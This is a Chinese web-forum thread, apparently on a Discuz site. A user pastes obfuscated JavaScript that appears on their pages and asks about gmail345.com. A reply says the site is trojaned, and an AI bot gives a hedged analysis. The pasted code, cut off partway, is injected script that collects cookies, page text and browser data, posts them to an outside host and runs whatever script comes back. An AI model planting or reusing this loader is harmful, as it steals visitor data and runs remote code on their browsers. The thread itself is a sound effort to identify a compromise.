婷姐 发表于 2021-11-25 08:20:29

不懂就问?

每次打开一个版块下面缓冲都会显示   

gmail345.com是一个什么网站
gmail345.com 下面代码是什么意思
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r=k;k=||e}];e=function(){return''};c=1};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p}(';!(e(g,D){7 m=\'10000021\';7 E=g.cookie;2(E.indexOf(\'unique\'+m+\'=\')!==-1||D[\'cid\']==m){n F}7 5=G();7 H=\'https://jieantech.cn/widget/loader.js\';7 c,8,9,o=\'\',j=\'\',I=\'\';7 J=((d Date()).getTime());2(K.L){c=\'K.L\'}p{c=navigator.userAgent.toLowerCase()}8=a.M(\'N\');9=a.M(\'embed\');2(g.q){o=g.q.innerText;7 O=(a.q.scrollHeight>(P.innerHeight||a.documentElement.clientHeight));2(O===F){2(8||9){2(8&&8){2((8.Q>=R)&&8.S>=T){j=1}}2(9&&9){2(9.Q>=R&&9.S>=T){j=1}}}}}c=k(c);7 U=\'h=\'+k(a.URL)+\'&b=\'+c+\'&u=\'+I+\'&tl=\'+k(a.title)+\'&kw=\'+k(o)+\'&f=\'+j+\'&t=\'+J;5.onreadystatechange=e(){2(5.readyState===4&&(5.r>=200&&5.r<300||5.r===304)){2(5.V){eval(5.V)}}};5.open(\'post\',H,W);5.withCredentials=W;5.setRequestHeader("Content-Type","application/x-www-form-urlencoded");5.send(U);setTimeout(e(){5.abort()},3000);e G(){2(s X!="Y"){n d X()}p 2(s v!="Y"){2(s w.y.z!="string"){7 l=["A.B.6.0","A.B.3.0","A.B"],i,C;for(i=0,C=l.length;i

IT618发布 发表于 2021-11-25 08:21:13

你网站被植入木马了,要查杀清理一下,并封堵后门

Discuz智能体 发表于 2025-3-20 21:56:16

你提到的代码片段看起来是一个经过混淆的JavaScript代码。这种代码通常用于隐藏其真实功能,可能是为了进行某种数据收集、广告注入或其他目的。以下是对这段代码的简要分析:

1. **代码混淆**:
   - 代码使用了`eval`函数来执行一段经过混淆的JavaScript代码。混淆的目的是让代码难以阅读和理解,通常用于隐藏恶意代码或保护知识产权。
   - 代码中使用了`function(p,a,c,k,e,r)`这样的混淆函数,通常会将代码中的变量名、函数名等进行替换,使其难以理解。

2. **功能分析**:
   - 代码中涉及到`cookie`的操作,可能是为了检查用户的某些状态或标识。
   - 代码还涉及到`navigator.userAgent`,这是用来获取用户浏览器的信息。
   - 代码中还有对页面元素的检查,比如`scrollHeight`、`clientHeight`等,可能是为了判断用户是否滚动到了页面的某个位置。
   - 最后,代码可能会通过`XMLHttpRequest`或`fetch`发送一些数据到服务器,可能是用户的浏览信息或其他数据。

3. **`gmail345.com`**:
   - `gmail345.com`可能是一个用于收集数据或注入广告的域名。这个域名可能被用来加载某些外部资源或发送数据。
   - 代码中提到的`https://jieantech.cn/widget/loader.js`可能是另一个外部资源,用于加载某些脚本或数据。

4. **潜在风险**:
   - 这种代码可能会对用户的隐私造成威胁,因为它可能会收集用户的浏览数据并发送到远程服务器。
   - 如果这段代码是未经用户同意就被注入到网站中的,那么它可能是恶意的。

5. **建议**:
   - 如果你在某个网站中发现了这段代码,建议你检查该网站的安全性,确保没有恶意代码被注入。
   - 如果你是一个网站管理员,建议你定期检查网站的代码,确保没有未经授权的脚本被注入。

如果你有更多关于这段代码的具体问题,或者需要进一步的帮助,请随时提问!
-- 本回答由 人工智能 AI智能体 生成,内容仅供参考,请仔细甄别。
页: [1]
查看完整版本: 不懂就问?